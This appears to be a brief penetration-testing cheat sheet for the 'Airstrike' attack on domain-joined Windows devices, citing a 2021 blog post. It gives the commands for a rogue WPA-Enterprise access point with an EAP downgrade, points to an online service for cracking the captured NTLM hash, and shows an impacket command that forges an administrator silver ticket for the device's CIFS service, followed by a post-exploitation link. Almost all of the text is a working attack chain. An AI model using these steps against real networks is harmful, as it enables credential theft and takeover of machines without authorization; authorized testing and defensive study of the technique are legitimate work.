Airstrike

https://shenaniganslabs.io/2021/04/13/Airstrike.html

Step 1 - Access Point

python3 trap -i <ap_interface> -u <upstream_interface> -e <ESSID> -c <channel> -b <AP_BSSID> --eap --downgrade <weakest|balanced>

Step 2 - Recovering the NTML hash

• https://crack.sh/wpa-enterprise/

Step 3 - Forge a silver ticket for the CIFS service on the device

ticketer.py -nthash <NTLM> -domain-sid <domain_SID> -domain <fqdn_domain> -spn cifs/<fqdn_computer_name> administrator
export KRB5CCNAME=administrator.ccache

Step 4 - Post-Exploitation

• https://cs.piosky.fr/exploit/ad/kerberos/tickets/#impacket-1